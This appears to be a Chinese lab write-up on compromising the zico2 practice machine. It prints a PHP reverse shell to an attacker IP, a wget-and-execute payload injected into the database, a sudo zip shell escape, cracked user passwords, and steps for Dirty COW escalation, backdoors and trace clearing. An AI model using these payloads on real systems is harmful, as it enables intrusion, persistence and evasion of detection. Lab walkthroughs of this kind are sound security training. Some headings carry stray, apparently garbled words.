靶机zico2练习:数据库插入反弹语句获取shell,脏牛提权,清除痕迹,留后门

1.主机发现php

2.端口扫描python

3.目录扫描web

4.端口访问shell

尝试一下,含有文件包含漏洞数据库

5.访问扫描出来的目录ssh

发现登陆端口,须要输入密码测试

尝试弱口令admin登陆成功spa

信息查询,发现用户名、密码.net

md5解密试试,root用户密码为:34kroot343d

zico用户密码为:zico2215@

因为存在ssh服务端口,尝试链接

链接失败!

6.漏洞搜索

查看文件

验证步骤以下:

存在远程PHP代码注入漏洞,尝试在数据库中插入phpinfo()语句,利用文件包含

测试成功

7.获取shell

攻击机上写反弹shell脚本

<?php $sock=fsockopen("192.168.109.159",7777);exec("/bin/sh -i <&3 >&3 2>&3");?>

打开Apache服务

删除以前创建的表a,新建表b,在目标数据库插入代码

<?php system("wget 192.168.109.159/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>

打开监听

访问网页:文件读取

获取shell并转换为交互式

查看权限

8.脏牛提权

下载脏牛文件到靶机/tmp目录下

编译文件并执行

切换用户

至此,提权成功!

9.拓展

看看文件

尝试远程登陆成功

使用命令失败

sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'"

命令成功参考: http://www.noobyard.com/article/p-ezhddzjc-mw.html

暂时未能找到解决方案,可采用脏牛提权!

经过脏牛提权后,能够编写后门文件

清除痕迹,恢复password文件

菜刀链接,获取webshell权限

链接成功!